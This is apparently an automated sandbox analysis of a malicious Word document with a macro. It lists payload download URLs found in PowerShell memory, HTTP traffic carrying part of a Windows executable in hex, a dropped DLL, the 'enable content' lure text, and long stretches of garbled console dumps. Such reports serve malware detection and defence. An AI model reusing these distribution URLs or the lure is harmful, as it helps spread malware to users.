Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in memory: http://tumkuv.org.tr/zd8dxb2u.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in memory: http://theworldofjacob.com/cjsomlo.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in memory: http://e-macom.com.br/cl35e0.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in memory: http://legion.seriesnow.website/q33rv2.zip
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Jan 2021 01:32:51 GMTServer: ApacheLast-Modified: Sun, 03 Jan 2021 06:35:59 GMTAccept-Ranges: bytesContent-Length: 303616Content-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 aa e0 fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global trafficHTTP traffic detected: GET /jhgun753.zip HTTP/1.1Host: mail.kyojinconduits.comConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1A67161-551E-40AF-9919-E039C2A6E74E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /jhgun753.zip HTTP/1.1Host: mail.kyojinconduits.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: mail.kyojinconduits.com
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in binary or memory: http://accuratebc.gr/e0lw3t.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in binary or memory: http://e-macom.com.br/cl35e0.zip
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in binary or memory: http://legion.seriesnow.website/q33rv2.zip
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094918402.0000000003CBC000.00000004.00000001.sdmpString found in binary or memory: http://mail.kyojinconduits.com
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096384093.000000001BA82000.00000004.00000001.sdmpString found in binary or memory: http://mail.kyojinconduits.com/jhgun753.zip
Source: powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in binary or memory: http://theworldofjacob.com/cjsomlo.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in binary or memory: http://tumkuv.org.tr/zd8dxb2u.zip
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001CE0 EntryPoint,GetTextCharacterExtra,CreateSolidBrush,IsCharAlphaW,GetOpenClipboardWindow,GetProcessWindowStation,IsWindowUnicode,LoadCursorW,DeleteObject,IsGUIThread,GetFontLanguageInfo,GetSystemPaletteUse,GetWindowTextLengthA,DeleteDC,GetClipboardOwner,DeleteEnhMetaFile,GetMenu,IsCharLowerW,DeleteMetaFile,GetMenuItemCount,ShowCaret,WindowFromDC,CharUpperA,CreateMetaFileW,IsCharAlphaNumericA,GetTextColor,CreateCompatibleDC,GetParent,GetSystemPaletteUse,FlattenPath,EndPath,GdiFlush,DestroyIcon,GdiGetBatchLimit,GetEnhMetaFileW,GetDCBrushColor,CreateMetaFileA,GdiGetBatchLimit,GetDoubleClickTime,GetCapture,GetWindowTextLengthA,ReleaseCapture,GetSystemMetrics,GetKBCodePage,GetEnhMetaFileA,IsMenu,LoadCursorFromFileW,CloseWindowStation,AddFontResourceW,IsMenu,GetShellWindow,GetKeyboardType,IsCharAlphaNumericA,GetSystemMetrics,GetMapMode,SaveDC,GdiFlush,FillPath,CreatePatternBrush,CharUpperW,AbortPath,CreateSolidBrush,GetCaretBlinkTime,AnyPopup,GetMessagePos,GetMessageExtraInfo,GetOpenClipboardWindow,PaintDesktop,CharLowerW,GetDlgCtrlID,GetMenuCheckMarkDimensions,CharLowerW,GetInputState,GetColorSpace,VkKeyScanW,BeginPath,CreateMetaFileA,IsGUIThread,DrawMenuBar,EnumClipboardFormats,GetLayout,ReleaseCapture,CharUpperA,CancelDC,LoadCursorFromFileA,DestroyIcon,DeleteEnhMetaFile,GetClipboardSequenceNumber,WindowFromDC,GetCursor,GetPixelFormat,GetWindowTextLengthW,GetDialogBaseUnits,IsIconic,DestroyWindow,OemKeyScan,GetMapMode,GetInputState,IsCharAlphaNumericA,DestroyMenu,GetDoubleClickTime,GdiFlush,GetKeyboardLayout,IsCharAlphaNumericA,CharUpperA,CharUpperW,GetDCPenColor,DeleteMetaFile,GetClipboardSequenceNumber,SwapBuffers,CreateMetaFileW,IsCharLowerA,GetTextAlign,DestroyMenu,DrawMenuBar,GetFontLanguageInfo,SwapBuffers,IsWindowUnicode,AnyPopup,EndMenu,WidenPath,RealizePalette,GetLastError,

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable editing" button on the top yellow bar, and then click "Enable content"
Source: Document image extraction number: 0Screenshot OCR: Enable content"
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dllJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 5133
Source: unknownProcess created: Commandline size = 5032
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5032
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029BA14 NtSetInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00925CB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091E0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0092DCA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009250A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00924CA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0090ACD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091A0D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009198DA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009188C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00918CC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091D030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00921020
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091C590
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091D980
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0092D180
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0090F9A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091FDD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009289F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009271F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00905150
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00901570
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00917564
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091AE80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00918AB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00921EB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009226B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00906AD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009196D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00923EC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0092FA10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091B6F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00918EF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009262F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091F6E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0090CA10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0092FA10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00920220
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0092D620
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00921240
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00909E70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00919E70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091A660
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00927660
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00922E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009183C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00917FC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00927FC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_009167C8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091E3F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00929B10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00923B00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00921730
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0091BF50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00915B60
Source: Order.802796810.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Hcpsclo3w5h, Function Document_open
Source: Order.802796810.docOLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.evad.winDOC@10/7@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$der.802796810.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmpJump to behavior
Source: Order.802796810.docOLE indicator, Word Document stream: true
Source: Order.802796810.docOLE document summary: title field not present or empty
Source: Order.802796810.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............`........................... .R.......R.....................................#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exeConsole Write: ............`...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....@.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N...............m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......m...............#.............}..v....0.......0.N.............H.m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................#.............}..v............0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... #...............#.............}..v....p.......0.N...............m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............]..j.....Im...............#.............}..v.....I......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....J................#.............}..v.....K......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............]..j.....Im...............#.............}..v.....Q......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....R................#.............}..v.....S......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............]..j.....Im...............#.............}..v.....Y......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....Z................#.............}..v.....[......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.... _......0.N.............hFm.....(.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......[..................j....._................#.............}..v....X`......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.1.............}..v....hd......0.N.............hFm.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j.... e................#.............}..v.....e......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............]..j.....Im...............#.............}..v....hl......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.... m................#.............}..v.....m......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....ht......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... u................#.............}..v.....u......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h|......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... }................#.............}..v.....}......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............]..j.....Im...............#.............}..v....h.......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.... .................#.............}..v............0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v.....#......0.N.....................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....#................#.............}..v....@$......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v.....*......0.N.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....+................#.............}..v.... ,......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................]..j.....Im...............#.............}..v....p1......0.N.....................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....(2................#.............}..v.....2......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......]..j.....Im...............#.............}..v....86......0.N.............hFm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....6................#.............}..v....p7......0.N..............Gm.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................=..j....E.h...............#.............}..v....h}......0.N...............m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................=..j....E.h...............#.............}..v............0.N...............m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
